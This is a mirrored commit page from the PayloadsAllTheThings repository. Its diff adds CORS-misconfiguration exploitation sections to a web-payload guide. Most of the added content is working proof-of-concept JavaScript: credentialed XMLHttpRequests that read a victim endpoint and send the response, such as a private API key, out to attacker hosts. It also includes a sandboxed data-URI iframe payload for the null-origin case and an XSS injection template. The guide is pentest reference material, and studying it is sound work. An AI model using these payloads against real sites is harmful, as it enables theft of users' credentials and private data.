mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Merge pull request #180 from mindfuckup/master
Added: Other CORS Misconfigurations
This commit is contained in:
commit
bc8dd0b784
@ -12,13 +12,15 @@
|
|||||||
|
|
||||||
* BURP HEADER> `Origin: https://evil.com`
|
* BURP HEADER> `Origin: https://evil.com`
|
||||||
* VICTIM HEADER> `Access-Control-Allow-Credential: true`
|
* VICTIM HEADER> `Access-Control-Allow-Credential: true`
|
||||||
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com`
|
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
|
||||||
|
|
||||||
## Exploitation
|
## Exploitation
|
||||||
|
|
||||||
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
|
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
|
||||||
|
|
||||||
### Vulnerable example
|
### Vulnerable Example: Origin Reflection
|
||||||
|
|
||||||
|
#### Vulnerable Implementation
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
GET /endpoint HTTP/1.1
|
GET /endpoint HTTP/1.1
|
||||||
@ -33,7 +35,7 @@ Access-Control-Allow-Credentials: true
|
|||||||
{"[private API key]"}
|
{"[private API key]"}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Proof of concept
|
#### Proof of concept
|
||||||
|
|
||||||
```js
|
```js
|
||||||
var req = new XMLHttpRequest();
|
var req = new XMLHttpRequest();
|
||||||
@ -74,6 +76,93 @@ or
|
|||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Vulnerable Example: Null Origin
|
||||||
|
|
||||||
|
#### Vulnerable Implementation
|
||||||
|
|
||||||
|
It's possible that the server does not reflect the complete `Origin` header but
|
||||||
|
that the `null` origin is allowed. This would look like this in the server's
|
||||||
|
response:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /endpoint HTTP/1.1
|
||||||
|
Host: victim.example.com
|
||||||
|
Origin: null
|
||||||
|
Cookie: sessionid=...
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Access-Control-Allow-Origin: null
|
||||||
|
Access-Control-Allow-Credentials: true
|
||||||
|
|
||||||
|
{"[private API key]"}
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Proof of concept
|
||||||
|
|
||||||
|
This can be exploited by putting the attack code into an iframe using the data
|
||||||
|
URI scheme. If the data URI scheme is used, the browser will use the `null`
|
||||||
|
origin in the request:
|
||||||
|
|
||||||
|
```html
|
||||||
|
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
|
||||||
|
var req = new XMLHttpRequest ();
|
||||||
|
req.onload = reqListener;
|
||||||
|
req.open('get','https://victim.example.com/endpoint',true);
|
||||||
|
req.withCredentials = true;
|
||||||
|
req.send();
|
||||||
|
|
||||||
|
function reqListener() {
|
||||||
|
location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
|
||||||
|
};
|
||||||
|
</script>"></iframe>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Vulnerable Example: XSS on Trusted Origin
|
||||||
|
|
||||||
|
If the application does implement a strict whitelist of allowed origins, the
|
||||||
|
exploit codes from above do not work. But if you have an XSS on a trusted
|
||||||
|
origin, you can inject the exploit coded from above in order to exploit CORS
|
||||||
|
again.
|
||||||
|
|
||||||
|
```
|
||||||
|
https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Vulnerable Example: Wildcard Origin `*` without Credentials
|
||||||
|
|
||||||
|
If the server responds with a wildcard origin `*`, the browser does never send
|
||||||
|
the cookies. Howver, if the server does not require authentication, it's still
|
||||||
|
possible to access the data on the server. This can happen on internal servers
|
||||||
|
that are not accessible from the Internet. The attacker's website can then
|
||||||
|
pivot into the internal network and access the server's data withotu
|
||||||
|
authentication.
|
||||||
|
|
||||||
|
#### Vulnerable Implementation
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
GET /endpoint HTTP/1.1
|
||||||
|
Host: api.internal.example.com
|
||||||
|
Origin: https://evil.com
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Access-Control-Allow-Origin: *
|
||||||
|
|
||||||
|
{"[private API key]"}
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Proof of concept
|
||||||
|
|
||||||
|
```js
|
||||||
|
var req = new XMLHttpRequest();
|
||||||
|
req.onload = reqListener;
|
||||||
|
req.open('get','https://api.internal.example.com/endpoint',true);
|
||||||
|
req.send();
|
||||||
|
|
||||||
|
function reqListener() {
|
||||||
|
location='//atttacker.net/log?key='+this.responseText;
|
||||||
|
};
|
||||||
|
```
|
||||||
|
|
||||||
## Bug Bounty reports
|
## Bug Bounty reports
|
||||||
|
|
||||||
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
|
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
|
||||||
@ -88,3 +177,4 @@ or
|
|||||||
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
|
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
|
||||||
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
|
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
|
||||||
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
|
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
|
||||||
|
* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors)
|
||||||
|
Loading…
Reference in New Issue
Block a user